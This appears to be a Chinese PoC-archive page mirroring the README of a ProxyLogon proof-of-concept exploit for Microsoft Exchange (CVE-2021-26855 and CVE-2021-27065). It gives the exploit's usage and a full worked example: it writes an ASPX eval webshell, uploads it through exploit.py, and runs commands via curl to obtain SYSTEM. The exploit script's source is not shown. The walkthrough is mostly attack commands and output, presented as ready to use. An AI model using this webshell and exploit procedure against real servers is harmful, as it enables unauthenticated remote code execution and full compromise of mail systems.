关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
描述
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
介绍
# proxylogon
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which allows for
unauthenticated remote code execution on Microsoft Exchange as described in the
following resources:
* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers
* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities
* https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits
## Usage
Exploitation requires knowledge of the frontend Exchange server URL (e.g.
`https://exchange.example.org`) and an email address for a user on the system.
The admin SID and backend can be leaked from the server.
```
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
[--webshell WEBSHELL] [--path PATH]
[--backend BACKEND]
[--proxy PROXY]
proxylogon proof-of-concept
optional arguments:
-h, --help show this help message and exit
--frontend FRONTEND external url to exchange (e.g. https://exchange.example.org)
--email EMAIL valid email on the target machine
--sid SID exchange admin sid
--webshell WEBSHELL webshell to upload
--path PATH desired path to webshell on host
--backend BACKEND [optional] backend host (leaked in X-CalculatedBETarget)
--proxy PROXY [optional] proxy traffic (e.g. http://127.0.0.1:8080)
```
## Example
```
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF
$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
--email administrator@hafnium.local \
--webshell webshell.aspx \
--path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!
$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
-d 'kxpprfgvnosz=Response.Write(
new ActiveXObject("WScript.Shell")
.Exec("cmd /c whoami")
.StdOut
.ReadAll()
);' | head -n 1
nt authority\system
```
文件快照
[4.0K] /data/pocs/f3d49719a80b23c1e496a32e85483c5ebfbe94d6
├── [8.3K] exploit.py
├── [ 11K] LICENSE
├── [2.4K] README.md
└── [ 8] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。